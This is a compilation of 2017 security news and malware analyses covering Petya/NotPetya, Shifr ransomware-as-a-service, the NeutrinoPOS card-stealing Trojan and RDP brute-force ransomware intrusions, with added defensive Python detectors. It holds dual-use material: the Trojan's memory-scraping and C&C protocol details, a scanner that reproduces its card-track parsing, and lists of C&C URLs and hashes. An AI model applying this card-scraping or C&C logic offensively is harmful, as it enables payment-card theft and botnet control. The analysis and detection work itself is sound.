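    """Return {src: {"arp_fanout": n, "smb_fanout": m}} for sources that sweep then connect."""
    arp_targets = defaultdict(set)
    smb_targets = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        flow = parse_flow(line)
        if flow["proto"] == "arp":
            arp_targets[flow["src"]].add(flow["dst"])
        elif flow["proto"] == "tcp/445":
            smb_targets[flow["src"]].add(flow["dst"])
    findings = {}
    for src in set(arp_targets) | set(smb_targets):
        arp_n, smb_n = len(arp_targets[src]), len(smb_targets[src])
        # Both signals together: a scan alone is noisy, SMB alone is a file server's daily life.
        if arp_n >= arp_threshold and smb_n >= smb_threshold:
            findings[src] = {"arp_fanout": arp_n, "smb_fanout": smb_n}
    return findings


def build_sample_flows() -> list:
    """Constructed flows: one infected host sweeping the subnet, one ordinary workstation."""
    flows = []
    # 10.0.0.5 ARP-probes 60 addresses, then opens SMB to 12 hosts that answered.
    for i in range(1, 61):
        flows.append(f"2017-06-27T15:00:{i % 60:02d} 10.0.0.5 -> 10.0.0.{i} arp")
    for i in range(10, 22):
        flows.append(f"2017-06-27T15:01:{i:02d} 10.0.0.5 -> 10.0.0.{i} tcp/445")
    # 10.0.0.7 resolves its gateway and file server, mounts one share, browses the web.
    flows += [
        "2017-06-27T15:00:30 10.0.0.7 -> 10.0.0.1 arp",
        "2017-06-27T15:00:31 10.0.0.7 -> 10.0.0.10 arp",
        "2017-06-27T15:00:32 10.0.0.7 -> 10.0.0.10 tcp/445",
        "2017-06-27T15:00:40 10.0.0.7 -> 93.184.216.34 tcp/80",
    ]
    return flows


if __name__ == "__main__":
    for src, counts in detect_spreaders(build_sample_flows()).items():
        print(f"{src}: ARP fan-out {counts['arp_fanout']}, SMB fan-out {counts['smb_fanout']}")
```

In a real deployment the counts would be taken over a sliding time window (the sweep and the SMB connections come within seconds of each other), and the same tcp/445 fan-out rule also covers the PsExec path the article mentions, since PsExec works over SMB as well.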

Petya ransomware demanding a ransom (photo: Avast)
Conclusion

Avast provided us with a screenshot of a computer after infection by the ransomware. Up-to-date information was shared on Twitter by, among others, Kateryna Kruk, a well-known political activist and political scientist. In one post she describes how her father could not refuel at a petrol station. The Kyiv metro, which was not accepting payment cards, also had problems.

What more can be said? Cyber attacks can seriously disrupt everyday life. The world apparently has not learned enough from the last attack, and patch installation is still underestimated. Some security principles may be underestimated as well.

Kateryna_Kruk @Kateryna_Kruk
Just called my father. He says he couldn't buy fuel at a petrol station, the system is shut down.
Everyone is disoriented.
15:26, 27. Jun. 2017
ArianaGic @GicAriana
What #Russia has hit in #cyberattack in #Ukraine SO FAR:
Government Ministry
Power grid
Banks
Media
Postal
Airport
Cell/internet providers
14:54, 27. Jun. 2017
Kateryna_Kruk @Kateryna_Kruk
National Police was targeted too, but it withstood all attacks.#Ukraine #CyberAttack
15:30, 27. Jun. 2017
6 6 retweetů 9 9lajků
Twitter Ads info and privacy
Sledovat
Kateryna_Kruk @Kateryna_Kruk
New victims in #Ukraine #CyberAttack: Ministry of Interior Affairs, Kyiv City administration, Pension Fund of Ukraine(!!!)
15:22, 27. Jun. 2017
14 14 retweetů 10 10lajků
Twitter Ads info and privacy
Sledovat
Kateryna_Kruk @Kateryna_Kruk
Even #Kyiv metro is under cyber attack. Payments by banking cards aren't accepted. https://twitter.com/kyivmetroalerts/status/879670749149245440 …
14:53, 27. Jun. 2017
12 12 retweetů 2 2lajky
Twitter Ads info and privacy
Incidentally, remember how Microsoft recently released certain patches for its unsupported operating systems Windows Vista and XP as well? It claimed to know of an impending attack. Was that a measure aimed precisely at yesterday's global outbreak of the modified Petya ransomware? We don't know yet.


Massive cyber attack fails: because of a rookie mistake the attackers won't earn a single crown

28.6.2017 Novinky/Bezpečnost Viruses
On Tuesday a new extortion virus, Win32/Diskcoder.C Trojan, started spreading across the internet like an avalanche. The malicious code won't pay off for the attackers, though, because they made a rookie mistake. They won't get a single crown out of the infected machines.

Instead of the operating system starting, users infected by the virus see this message.
Most extortion viruses are fairly sophisticated malicious code. After locking the computer they demand a ransom, and the payment from each infected victim is directed to a different bitcoin wallet. Tracing the attackers is therefore practically impossible, and blocking the individual transactions is just as unrealistic. Attackers often make millions of crowns from extortion viruses.

In the case of the Win32/Diskcoder.C Trojan ransomware, however, the attackers weren't so clever. They communicate with the owners of infected computers through an e-mail address on the posteo.net server. Essentially everyone who wants to unlock their computer has to write to the attackers.

The e-mail account is blocked
The operators of posteo.net did not like that at all, so they blocked the pirates' mailbox on Tuesday evening, only a few hours after the extortion virus began spreading across the internet.

At the moment it is therefore practically impossible to pay the ransom, even though the attackers demand it: without a working e-mail contact, a victim has no way to prove a payment or receive a key. Even given the number of infected machines, it is already certain that the cyber criminals will not earn anything beyond the handful of payments made before the mailbox was closed.

On Tuesday evening the Win32/Diskcoder.C Trojan ransomware hit the banking sector and energy and postal companies. It attacked households just the same. Ukraine is the most affected, but the Czech Republic also made it into the top ten countries where the virus raged most and currently sits in ninth place.

A treacherous extortion virus
Win32/Diskcoder.C Trojan is a rather treacherous piece of malicious code. Most extortion viruses need quite a lot of time to encrypt the data on the hard disk, easily several hours. During that time an antivirus program can catch their activity and block them before they do any major damage on the computer.

The newly discovered threat works differently. It does not encrypt all the data on the disk: it overwrites the MBR (Master Boot Record), the boot record through which the whole operating system is essentially started, with its own loader and, after a reboot, encrypts the file system's master file table. The computer then has no access to its own file records and, instead of Windows, only shows a message demanding a ransom.

Overwriting the MBR does not take the new extortion virus several hours, only a few seconds, so antivirus software that waits for the usual lengthy encryption activity has practically no chance to catch the malicious code. After the first restart the problem is out in the open.


Computer virus hit global companies; even Chernobyl was affected

28.6.2017 Novinky/Bezpečnost Viruses
Companies in a number of European countries became targets of a cyber attack on Tuesday. The Danish shipping company Maersk and the Russian oil giant Rosneft were hit. The attack was particularly extensive in Ukraine, where targets included the Chernobyl nuclear power plant, the postal service, the largest energy distribution company Ukrenergo and the central bank.
Among those affected were the American multinational food group Mondelez, the leading shipper Maersk, the French building-materials maker Saint-Gobain, the Russian oil company Rosneft, the British advertising firm WPP and the aircraft maker Antonov.

According to statements from the affected institutions in Ukraine, the actions of the unidentified attackers disrupted their operations. The Chernobyl nuclear power plant was affected as well; according to the AFP agency, technicians were forced to interrupt radioactivity monitoring. Other affected enterprises included the state postal service, the largest state-owned bank Oschadbank, the largest energy distributor Ukrenergo and, at least partially, the government computer network.

The central bank said it had become the target of an "unknown virus" and added in a statement that it believed it was sufficiently protected against cyber attacks. Russia's Rosneft had to switch to a backup control system because of the attack.

According to the Interfax-Ukraine agency, the virus behaves similarly to the WannaCry extortion virus, whose authors demanded a ransom from the infected. Computer expert Alan Woodward of the University of Surrey confirmed this to the BBC.

"It seems to be a version of the extortion virus (ransomware) that appeared last year. The criminals updated it at the beginning of this year when some of its aspects were defeated. That ransomware was called Petya and its updated version PetrWrap," Woodward said.


Shifr RaaS lets anyone create a simple ransomware in just 3 steps
28.6.2017 securityaffairs
Ransomware

Over the weekend, security experts discovered a new Ransomware-as-a-Service dubbed Shifr RaaS that lets anyone create a ransomware by filling in three form fields.
Ransomware is a profitable business for crooks, so it is no surprise that the Ransomware-as-a-Service (RaaS) model keeps succeeding in the cyber criminal ecosystem.

Over the weekend, several security experts discovered a new Ransomware-as-a-Service website that allows wannabe cyber criminals to create their own ransomware just by filling in three form fields.

The website is hosted on the Dark Web, and the ransom payments it collects are handled in Bitcoin.

Shifr RaaS

This is probably one of the easiest-to-use RaaS websites. The ransomware was dubbed Shifr after the extension it appends to encrypted files, and it is written in Go.

“We’ve called it Shifr based on the extension it adds to encrypted files, but G Data security researcher Karsten Hahn has told Bleeping Computer that an initial analysis of this new threat reveals clues that Shifr might be related to Trojan.Encoder.6491, the first ever ransomware written in Go, discovered last year by Dr.Web security researchers.” states a blog post published by BleepingComputer.

Creating a Shifr ransomware is simple: wannabe criminals enter the size of the ransom the malware should demand and a Bitcoin address to receive victims' payments, then solve a CAPTCHA challenge and press a button.

“While other RaaS portals will ask for an entry fee or verify their clients to ensure only skilled crooks (and not security researchers) get their hands on ransomware samples, this service offers a fully weaponized sample in a few easy steps.” states Catalin Cimpanu from BleepingComputer.

Soon after the service went live, users started submitting Shifr samples to VirusTotal, and many antivirus vendors now detect them as a threat.

Unlike other RaaS services, the operators behind Shifr keep only a 10% cut of the ransom; for comparison, the operators of the Cerber RaaS keep a 60% share.

At this stage we cannot rule out that Shifr RaaS is a scam and that the operators will never pay distributors their cut.

The only certainty is that the ransomware is unsophisticated and lacks many features, which suggests it may be a work in progress.

The researchers noticed, for example, that the crooks host the payment portal and the RaaS service on the same servers, which is poor operational practice.

It is easy to predict the rapid spread of RaaS services in the coming months.


Neutrino modification for POS-terminals
28.6.2017 Kaspersky
Virus

POS MALWARE TROJAN-BANKERS ZEUS
From time to time the authors of effective, long-lived Trojans and viruses create new modifications and forks of them, like any other software authors. One of the best-known examples is Zeus (Trojan-Spy.Win32.Zbot in Kaspersky Lab's classification), which continues to spawn new modifications of itself every year. In a strange way this malware has come to resemble its namesake from Greek mythology. Malware families such as Mirai, NJRat, Andromeda and others also belong to this "prolific" group. The malware named "Neutrino" holds an important place in this line of well-known Trojans, offering various types of infection, spreading and payload.

In this article we analyze a very special species: a variant that can collect credit card information from POS terminals.

Kaspersky Lab products detect it as Trojan-Banker.Win32.NeutrinoPOS.

MD5 of the described file: 0CF70BCCFFD1D2B2C9D000DE496D34A1

First stage

The Trojan takes a long "sleep" before it starts. This code seems to have been added to fool AV sandboxes. The Trojan uses a pseudorandom number generator to determine the length of the delay.

C&C Communication

At the next stage the Trojan extracts a C&C address list from its body. The list is Base64-encoded. After decoding, the Trojan tries to find a working C&C using the following algorithm:

It sends a POST request to the server, passing in the body the Base64-encoded string "enter" (ZW50ZXI=). All encoded strings carry the prefix "_wv=".


A working server responds with a 404 page that ends with the encoded string c3VjY2Vzcw== ("success"). On "success", the Trojan marks the address of that server as working.


Note also that the header of each POST request contains an "auth" field, which stays the same for every sample of the NeutrinoPOS family.
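The check-in exchange described above, written out as an added example (this is not Kaspersky's code): a small classifier that recognizes the NeutrinoPOS C&C probe in proxy or IDS captures. The request/response pairs it runs on are constructed for illustration; the value of the constant "auth" header is not given in the analysis, so the check only tests for its presence.

```python
import base64
import binascii

# Constants observed in the NeutrinoPOS check-in (from the analysis above).
BODY_PREFIX = b"_wv="
ENTER_B64 = base64.b64encode(b"enter")      # b"ZW50ZXI="
SUCCESS_B64 = base64.b64encode(b"success")  # b"c3VjY2Vzcw=="


def decode_wv_body(body: bytes):
    """Strip the _wv= prefix and Base64-decode the bot's POST body.
    Returns None when the body does not follow the observed format."""
    if not body.startswith(BODY_PREFIX):
        return None
    try:
        return base64.b64decode(body[len(BODY_PREFIX):], validate=True)
    except (ValueError, binascii.Error):
        return None


def is_neutrino_checkin(method: str, headers: dict, body: bytes) -> bool:
    """Request side: POST, an 'auth' header, body '_wv=' + base64('enter')."""
    if method.upper() != "POST":
        return False
    if not any(name.lower() == "auth" for name in headers):
        return False
    return decode_wv_body(body) == b"enter"


def is_neutrino_checkin_reply(status: int, body: bytes) -> bool:
    """Response side: HTTP 404 whose page ends with base64('success')."""
    return status == 404 and body.rstrip().endswith(SUCCESS_B64)


def classify_exchange(exchange: dict) -> str:
    """Label one request/response pair: 'c2-alive', 'c2-probe' or 'benign'."""
    if not is_neutrino_checkin(exchange["method"], exchange["req_headers"], exchange["req_body"]):
        return "benign"
    if is_neutrino_checkin_reply(exchange["status"], exchange["resp_body"]):
        return "c2-alive"
    return "c2-probe"


# Constructed exchanges (not real captures) for a quick self-check.
SAMPLE_EXCHANGES = [
    {   # bot finds a live panel
        "method": "POST",
        "req_headers": {"Host": "panel.example.invalid", "auth": "d3d3d3d3"},
        "req_body": b"_wv=ZW50ZXI=",
        "status": 404,
        "resp_body": b"<html><body>Not Found</body></html>\nc3VjY2Vzcw==",
    },
    {   # bot probes a dead or sinkholed host
        "method": "POST",
        "req_headers": {"Host": "old.example.invalid", "auth": "d3d3d3d3"},
        "req_body": b"_wv=ZW50ZXI=",
        "status": 404,
        "resp_body": b"<html><body>Not Found</body></html>",
    },
    {   # ordinary form post
        "method": "POST",
        "req_headers": {"Host": "shop.example.invalid"},
        "req_body": b"user=alice&pass=x",
        "status": 200,
        "resp_body": b"ok",
    },
]


def classify_all(exchanges=SAMPLE_EXCHANGES):
    return [classify_exchange(e) for e in exchanges]


if __name__ == "__main__":
    print(classify_all())
```

A 404 page that carries a trailer is the part worth alerting on: an ordinary web server never appends content after the closing tag of its error page, so the "c2-alive" verdict is a strong signal even without the sample's own "auth" value.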
 

Restored code of the C&C server check
The C&C address stored in the registry branch HKCR\Software\alFSVWJB is the same as the other variables and data used by the NeutrinoPOS sample. The branch name differs from the one described here, but after a full comparison of both samples we can state that they are the same modification of Neutrino.

C&C Commands

The described variant contains the following functions:

Download and start a file;
Take a screenshot;
Search for a process by name;
Change registry branches;
Search for a file by name on the infected host and send it to the C&C;
Proxy.

The server sends commands as plain names such as "PROXY" or "screenshot", Base64-encoded in transit. From the analysis we can state that the current versions of Neutrino contain no DDoS functionality.
 

Implementation of the command checksum calculation

Examples of a few commands (marked with a red line on the screenshot above):

Rolxor(“PROXY”) = 0xA53EC5C
Rolxor(“screenshot”) = 0xD9FA0E3

NeutrinoPOS command handler
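The checksum routine itself is not spelled out in the text, but the two printed values are reproduced exactly by a per-byte rotate-left-by-7 / XOR over a 32-bit accumulator that starts at zero. The following added example (not Kaspersky's code) implements that and uses it to map checksums pulled from the dispatcher back to command names; every candidate name other than "PROXY" and "screenshot" is an assumption a reverser would try.

```python
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def rol32(value: int, bits: int) -> int:
    """Rotate a 32-bit value left by `bits` (x86 ROL semantics)."""
    value &= MASK32
    return ((value << bits) | (value >> (32 - bits))) & MASK32


def rolxor(command: str, rotate: int = 7) -> int:
    """Checksum used by the command handler: for each byte of the command,
    accumulator = rol32(accumulator, 7) XOR byte, starting from zero."""
    h = 0
    for byte in command.encode("ascii"):
        h = rol32(h, rotate) ^ byte
    return h


# "PROXY" and "screenshot" come from the analysis; the rest are guesses
# (assumed names) to try against constants found in the dispatcher.
CANDIDATE_COMMANDS = ["PROXY", "screenshot", "download", "exec", "findfile", "proc"]


def build_table(candidates: Iterable[str] = CANDIDATE_COMMANDS) -> dict:
    """Checksum -> command name, for turning dispatcher constants back into commands."""
    return {rolxor(name): name for name in candidates}


def resolve(checksum: int, table: Optional[dict] = None) -> Optional[str]:
    """Look a dispatcher constant up; None means the name is not in the candidate list."""
    table = table if table is not None else build_table()
    return table.get(checksum & MASK32)


if __name__ == "__main__":
    for cmd in ("PROXY", "screenshot"):
        print(f"Rolxor({cmd!r}) = 0x{rolxor(cmd):X}")
```

Because the hash is only 32 bits and the rotation is fixed, unknown constants in the handler are best recovered by dictionary rather than by inversion: feed every command word from related families into build_table() and see which constants light up.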
 

Stealing of credit cards

The algorithm for stealing credit card information is implemented in the Trojan in a fairly simple way:

The Trojan walks the currently running processes using CreateToolhelp32Snapshot / Process32FirstW / Process32NextW.

Using OpenProcess / VirtualQuery / ReadProcessMemory, the Trojan obtains information about the process's memory pages and reads them.

The Trojan scans the memory pages for the string "Track1", which marks the fields of the magnetic stripe's first track. The fields are then checked one after another:
A sequence of digits '0'-'9' with a length of 15, 16 or 19 (the PAN), validated with the Luhn algorithm.
The presence of the separator '^' in the preceding and following fields.
The card holder name, extracted with a maximum length of 26 characters in accordance with ISO/IEC 7813.
The remaining data (expiration date, service code and the discretionary data carrying the CVV) is extracted as one block, with checks on its length and content.

The collected data is sent to the server tagged "Track1".

After that, the Trojan extracts the fields tagged "Track2" in the same way:
First it extracts the PAN with the same checks as in the previous stage.
The separator is '=' (or 'D' when the track is nibble-encoded).
Track 2 does not contain the card holder name; the remaining data is extracted as one block.

The collected data is sent to the server tagged "Track2".
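The acceptance tests the Trojan applies to track data, as an added example (not Kaspersky's code) written the way a memory-scanning DLP or hunting tool would use them: regular expressions for the ISO/IEC 7813 track layouts, the PAN length and Luhn checks, and the 26-character name limit. The buffer it scans is constructed from well-known test card numbers and contains no real cardholder data; scanning real process memory would replace the constant with the pages read via ReadProcessMemory.

```python
import re

PAN_LENGTHS = {15, 16, 19}
# Track 1 (format code B): %B<PAN>^<NAME>^<YYMM><service code><discretionary>?
TRACK1_RE = re.compile(rb"%?B(\d{15,19})\^([A-Z0-9 ./'-]{1,26})\^(\d{4})(\d{3})([^?\x00]{0,60})\??")
# Track 2: ;<PAN>=<YYMM><service code><discretionary>?   ('=' is 0x3D, 'D' when nibble-encoded)
TRACK2_RE = re.compile(rb";?(\d{15,19})[=D](\d{4})(\d{3})([^?\x00]{0,60})\??")


def luhn_ok(pan: str) -> bool:
    """Standard Luhn check: double every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ord(ch) - ord("0")
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def pan_ok(pan: str) -> bool:
    """The Trojan's own filter: 15, 16 or 19 digits and a valid check digit."""
    return len(pan) in PAN_LENGTHS and luhn_ok(pan)


def scan_buffer(buf: bytes):
    """Return track-1 and track-2 records found in a memory buffer, in offset order."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode()
        if pan_ok(pan):
            hits.append({"track": 1, "offset": m.start(), "pan": pan,
                         "name": m.group(2).decode(), "expiry": m.group(3).decode(),
                         "service": m.group(4).decode()})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if pan_ok(pan):
            hits.append({"track": 2, "offset": m.start(), "pan": pan,
                         "name": None, "expiry": m.group(2).decode(),
                         "service": m.group(3).decode()})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed buffer: public test card numbers, fake name, a decoy with a bad check digit.
SAMPLE_MEMORY = (
    b"\x00\x00garbage\x00"
    b"%B4111111111111111^DOE/JOHN^25121011000000000000?\x00"
    b"\x00padding\x00"
    b";5500000000000004=25121011000000000?\x00"
    b";4111111111111112=25121011000000000?\x00"   # fails Luhn, must be ignored
    b"\x00"
)


if __name__ == "__main__":
    for hit in scan_buffer(SAMPLE_MEMORY):
        print(hit)
```

The same three checks (length, Luhn, separators) are what make the scraper quiet: any digit run that fails them is never exfiltrated, so a defender's memory scanner should be at least this strict to avoid drowning in false positives.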
Distribution Statistics

The largest areas of infection are Russia and Kazakhstan. Nearly 10% of the infected computers belong to small-business corporate customers.
 

Conclusion

As the described Neutrino Trojan shows, even a member of an old, well-known and thoroughly researched family keeps surprising malware analysts and researchers with atypical functionality or applications. We see the same with Mirai forks, for example, which are produced in enormous numbers across all platforms and in many species.

Generally speaking, any publication of malware source code with a good architecture and varied functionality attracts the interest of malware authors, who try to use it in nearly every possible way of making money illegally. We can assume that new modifications of Neutrino with crypto-currency mining functionality may already exist.

MD5

CECBED938B10A6EEEA21EAF390C149C1
66DFBA01AE6E3AFE914F649E908E9457
4DB70AE71452647E87380786E065F31E
9D70C5CDEDA945CE0F21E76363FE13C5
B682DA77708EE148B914AAEC6F5868E1
5AA0ADBD3D2B98700B51FAFA6DBB43FD
A03BA88F5D70092BE64C8787E7BC47DE
D18ACF99F965D6955E2236645B32C491
3B6211E898B753805581BB41FB483C48
7D28D392BED02F17094929F8EE84234A
C2814C3A0ACB1D87321F9ECFCC54E18C
74404316D9BAB5FF2D3E87CA97DB5F0C
7C6FF28E0C882286FBBC40F27B6AD248
729C89CB125DF6B13FA2666296D11B5A
855D3324F26BE1E3E3F791C29FB06085
2344098C7FA4F859BE1426CE2AD7AE8E
C330C636DE75832B4EC78068BCF0B126
CCBDB9F4561F9565F049E43BEF3E422F
53C557A8BAC43F47F0DEE30FFFE88673

C&C

hxxp://pranavida.cl/director/tasks.php
hxxps://5.101.4.41/panel/tasks.php
hxxps://5.101.4.41/updatepanel/tasks.php
hxxp://jkentnew.5gbfree.com/p/tasks.php
hxxp://124.217.247.72/tasks.php
hxxp://combee84.com/js/css/tasks.php
hxxp://nut29.xsayeszhaifa.bit/newfiz29/logout.php
hxxp://nut29.nsbacknutdoms11war.com/newfiz29/logout.php
hxxp://jbbrother.com/jbb/meaca/obc/pn/tasks.php
hxxp://ns1.posnxqmp.ru/PANEL/tasks.php
hxxp://nut25.nsbacknutdoms11war.com/newfiz25/logout.php
hxxp://propertiesofseyshellseden.com/newfiz21/logout.php
hxxp://n31.propertiesofseyshellseden.com/newfiz31/logout.php


Ransomware attack analysis: an open RDP port and a weak password are enough
28.6.2017 Root.cz
Viruses
At the beginning of this year a ransomware attack was carried out against the Windows servers of several dozen companies. The situation was always very similar: in the morning users started calling to say that the computer systems were unavailable.
How the compromise happened
The system administrators who were called in then found that all files such as documents, images, pdf, txt, rar, zip and, surprisingly, even exe, in all directories (except the Windows directory) and on all mapped network drives were encrypted. Because most administrators had not disconnected their backup devices, the backups were encrypted too. The extension of the modified files differed from one affected company to another: sometimes it was randomly generated, sometimes it was .wallet. On the Windows server's desktop there was a notice along these lines:

ALL YOUR IMPORTANT FILES ARE ENCRYPTED. For more information, open the file „HOW TO DECRYPT FILES.html“ on the desktop or any other folder with encrypted files.
That file also contained a contact e-mail on some exotic domain (india.com, asia.com and others) and a bitcoin wallet address, unique for each attack. When talking to the administrators of these compromised systems, most of them claimed that the only way their systems could have been compromised was via e-mail. The incident supposedly went like this: a secretary opened an infected e-mail and the disaster was done. Unfortunately, the reality was different. The common denominator of the roughly 15 compromised servers I was able to analyze was the operating system MS Windows in the versions 2008, 2008R2, 2012 Server and Small Business Server. In addition, Remote Desktop (RDP) was running on port 3389.

Some of the affected companies tried to contact the attacker at the e-mail address given. The communication was always in English and always short, so it is impossible to tell from it whether English is the attacker's native language. The response time to an e-mail was always an hour or two. The amount in bitcoins varied, from 2 to 4 bitcoins. One of the affected companies managed to negotiate the price for decrypting its files down to 0.8 bitcoin. To pay or not to pay is the eternal dilemma. The general recommendation is not to pay and thus not to support the malware authors. Unfortunately, for some companies the data was so important that they decided to pay.

After paying the agreed amount in bitcoins, the affected companies received by e-mail a binary exe file that the administrators were supposed to run on the compromised system to obtain a unique ID, which was then to be sent to the attackers' e-mail. A unique binary exe file for decrypting the files was then generated for them. The numeric ID was probably the public key of the asymmetric cryptography used. The perpetrators delivered what they promised, and the companies that paid got their files back. By distributing the decryption files via e-mail, the attacker avoided building C&C servers and essentially saved money.

Data analysis
Disks from the servers (or virtual disks), netflow, logs from the border router and possibly other individual data were requested from the affected companies. Unfortunately, most of the affected companies did not collect netflow, and the border routers were SOHO devices (or VDSL modems from the ISP), so there were not many network logs. Some companies were limited by disk capacity and therefore wiped the compromised servers before a backup could be made for analysis. As I mentioned above, the ransomware skipped the C:\Windows directory, so the Event Log EVTX files (Event Viewer) were available.

Analysis of the data (done entirely on Linux) found that the weak spot of the compromised servers was the open port 3389, against which the attacker ran a dictionary attack. In several cases a clean operating system had been installed years ago with a weak administrator password and the machine was then joined to a domain. Unfortunately, the weak administrator password stayed. Furthermore, in several cases the password security policy (complexity, account lockout and so on) had been disabled on management's instruction. During the analysis of all the data it turned out that, surprisingly, these intrusions had already taken place between October and December of last year, but the actual data encryption only happened at the beginning of 2017. The first attack was recorded as early as August, when it was not completed thanks to an attentive system administrator.

It was also visible how the attacker gradually improved. At first he used the administrator or admin account, and gradually realized that this could easily give him away. He started creating various new users with names like test, ss, system, adm.smallbusiness, diablo, ssystem, sbs1 and the like.
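The pattern described here (a burst of failed RDP logons from one address, then a successful one, then new local accounts) can be pulled straight out of the Security log. The following added example (not the article's code) does exactly that over a constructed CSV export of event IDs 4625, 4624 and 4720 in the column order you would get from Get-WinEvent; the column layout, threshold and window are assumptions, and the addresses are documentation ranges, not real attackers.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample shaped like a Security-log CSV export
# (TimeCreated, EventID, TargetUserName, LogonType, IpAddress). Not real data.
SAMPLE_EVENTS = """\
2016-10-03T01:02:11,4625,administrator,10,203.0.113.7
2016-10-03T01:02:13,4625,administrator,10,203.0.113.7
2016-10-03T01:02:15,4625,admin,10,203.0.113.7
2016-10-03T01:02:18,4625,administrator,10,203.0.113.7
2016-10-03T01:02:20,4625,admin,10,203.0.113.7
2016-10-03T01:02:25,4625,administrator,10,203.0.113.7
2016-10-03T01:05:40,4624,administrator,10,203.0.113.7
2016-10-03T01:07:02,4720,sbs1,-,-
2016-10-03T08:15:00,4625,jnovak,10,198.51.100.20
2016-10-03T08:15:30,4624,jnovak,10,198.51.100.20
"""

FAIL_THRESHOLD = 5                 # assumed: failures from one IP inside WINDOW
WINDOW = timedelta(minutes=10)     # assumed: tune to the environment
RDP_LOGON_TYPES = {"10", "3"}      # 10 = RemoteInteractive; with NLA, failures land as type 3


def parse_events(text: str):
    """Turn the CSV export into dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        ts, eid, user, ltype, ip = line.strip().split(",")
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "user": user, "logon_type": ltype, "ip": ip})
    return events


def analyse(events):
    """Find password-guessing bursts per source IP, successful logons that follow
    a burst from the same IP, and accounts created after such a logon."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["id"] in (4624, 4625) and ev["logon_type"] in RDP_LOGON_TYPES:
            by_ip[ev["ip"]].append(ev)

    bruteforce, compromised, compromise_times = [], [], []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        recent_fails, burst_at = [], None
        for ev in evs:
            if ev["id"] == 4625:
                recent_fails = [t for t in recent_fails if ev["time"] - t <= WINDOW] + [ev["time"]]
                if burst_at is None and len(recent_fails) >= FAIL_THRESHOLD:
                    burst_at = ev["time"]
                    bruteforce.append(ip)
            elif burst_at is not None:          # a 4624 after a burst from the same address
                compromised.append((ip, ev["user"]))
                compromise_times.append(ev["time"])

    new_accounts = [ev["user"] for ev in events
                    if ev["id"] == 4720 and compromise_times and ev["time"] >= min(compromise_times)]
    return {"bruteforce_ips": bruteforce, "compromised": compromised, "new_accounts": new_accounts}


if __name__ == "__main__":
    print(analyse(parse_events(SAMPLE_EVENTS)))
```

Two caveats from the article's own findings apply when running this on a real server: with account lockout disabled there is no 4740 event to lean on, so the failure count is the only signal, and because the attackers returned months after the first guessing, the 4720 correlation should look well beyond the same day.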

After cracking the password, the attacker used the compromised server for his own purposes and did not bother much about cleaning up after himself. Thanks to that, various tools were found on the Windows desktop: an ad-clicking application, a tool for a distributed attack on a bitcoin exchange, IP scanners for scanning address ranges, RDPBrute tools for dictionary attacks, a GeoIP database with IP ranges to scan, various dictionaries suitable for dictionary attacks, and a list of proxy servers for anonymization. Some of these files had names written in Cyrillic. Searching Google for the names turned up download links for these files on Russian discussion forums.

So that the attacker would not be bothered by antivirus warnings, unlockers were used to unlock locked files in the system. That made it possible to delete any locked file, so the attacker could easily cripple the antivirus until it no longer worked. Once the attacker no longer needed the server, he turned off the Volume Shadow Copy service (so the files could not be restored easily) and started the encryption process by hand.

Here, too, there was development over time. Launching applications by hand was gradually replaced by various cmd and PowerShell scripts. The crypto-ransomware itself needed the MS Visual C++ 2010 or newer runtime libraries installed. In one case a VMware hypervisor running both MS Windows and Linux was compromised, and since the attacker had no working crypto-ransomware for Linux, he simply deleted the whole virtual server including its virtual disk.

All IP addresses from which successful or unsuccessful attacks were carried out were analyzed, among other things, in Shodan, which showed that most of the attacking IP addresses had port 3389 open, i.e. they were servers compromised in the same way. The IP addresses came from all over the world; addresses from Russia and Ukraine prevailed, followed by the USA, Canada, Iran, the Seychelles and others. The StrongVPN and CyberGhost anonymizers were used as well. One IP address belonged to a medical facility for radiation treatment of cancer patients somewhere in Indonesia.

Lessons for next time
Since carrying out a similar attack is very simple, two different cases turned up within this series in which, after the system was taken over, the open-source software DiskCryptor, normally used for legitimate partition encryption, was run. This attacker then demanded payment in bitcoins as well. After the money was transferred, he sent the passwords that had been typed in by hand when encrypting the partition. The complexity of these passwords was not high (at most 6 characters); in one case the password consisted only of digits.

Lesson for everyone: in my opinion no service for administering an entire company system belongs on a public IP address. If access from the internet is necessary, a VPN with strong certificate-based authentication (OpenVPN, L2TP/IPsec ...) must be used. It is also important to think about backups. It is not enough just to back up; you also have to think about the security and integrity of the stored backups.

At the time these attacks got going (i.e. January 2017) I did a survey in Shodan.io. I searched for IP addresses with port 3389 open in the area of one regional capital. In Shodan's results you can even see user names for some of the IP addresses, which makes a potential attacker's work significantly easier. I repeated the same Shodan search three months later and found a 30% increase in open 3389 (RDP) ports, which is very worrying. If administrators do not start paying more attention to security, we may see more attacks like this in the future.


Schroedinger’s Pet(ya)
28.6.2017 Kaspersky
Ransomware

DATA ENCRYPTION MALWARE DESCRIPTIONS MBR PETYA RANSOMWARE VULNERABILITIES AND EXPLOITS
Earlier today (June 27th), we received reports about a new wave of ransomware attacks spreading around the world, primarily targeting businesses in Ukraine, Russia and Western Europe. If you were one of the unfortunate victims, this screen might look familiar:
 

Kaspersky Lab solutions successfully stop the attack through the System Watcher component. This technology protects against ransomware attacks by monitoring system changes and rolling back any potentially destructive actions.

At this time, our telemetry indicates more than 2,000 attacks:
 

Our investigation is ongoing and our findings are far from final at this time. Despite rampant public speculation, the following is what we can confirm from our independent analysis:

How does the ransomware spread?

To capture credentials for spreading, the ransomware uses custom tools similar to Mimikatz. These extract credentials from the lsass.exe process. After extraction, the credentials are passed to PsExec or WMIC for distribution inside the network.

Other observed infection vectors include:

A modified EternalBlue exploit, also used by WannaCry.
The EternalRomance exploit, a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (note: patched with MS17-010).
An attack against the update mechanism of a third-party Ukrainian software product called MeDoc.
IMPORTANT: A single infected system on the network possessing administrative credentials is capable of spreading this infection to all the other computers through WMI or PsExec.

What does the ransomware do?

